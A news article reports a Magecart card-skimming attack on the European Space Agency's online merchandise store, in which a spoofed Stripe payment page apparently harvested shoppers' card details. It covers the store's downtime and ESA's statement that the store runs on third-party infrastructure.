Cybersecurity experts Sansec BV posted to the Bluesky social media platform, Dec. 23, to report that “Foreign espionage campaign launched via Christmas sweaters” in one of the more unusual cybersecurity announcements of 2024. A web application security specialist, Source Defense Research, took to X and confirmed that a live Magecart attack had taken place against the European Space Agency online store. Here’s what we know so far.
Hackers Leave European Space Agency Online Store Temporarily Out Of Orbit
If you fancied getting hold of some European Space Agency merchandise as a post-Christmas treat, then you are out of luck it would seem. Visit the ESA store currently and you’ll see a notice informing you that the site is “temporarily out of orbit for some exciting renovations.” While the humorous puns continue with visitors being asked to please fly by later, the real reason behind the downtime appears to be far more serious.
The X posting from Source Defense Research claimed that, while the ESA space shop site follows the latest Payment Card Industry Data Security Standard, PCIDSS 4.0, the hackers were able to use the fact that the shop employed Stripe to execute “ a double-entry technique, faking Stripe’s page on the ESA site.”
Inserting A Fake Payment Page Into The European Space Agency Store—The Christmas Jumper Hack Explained
It would appear that a fake payment page was inserted into the process, served upon from the ESA shop and for all intents and purposes looking like the genuine article. The Source Defense Research posting included screenshots showing the malicious payment page alongside the real one, but employing a domain-spoofing technique with a different top-level domain used.
I have reached out to both the European Space Agency and Stripe for a statement. In the meantime, however, it has been reported that ESA has “clarified that the store operates on third-party infrastructure, and the agency does not manage its data,” so the extent to which this hack impacts ESA data itself is likely to be minimal, if at all. Instead, it looks like it was most likely an opportunistic criminal attack with a pure profit motive.
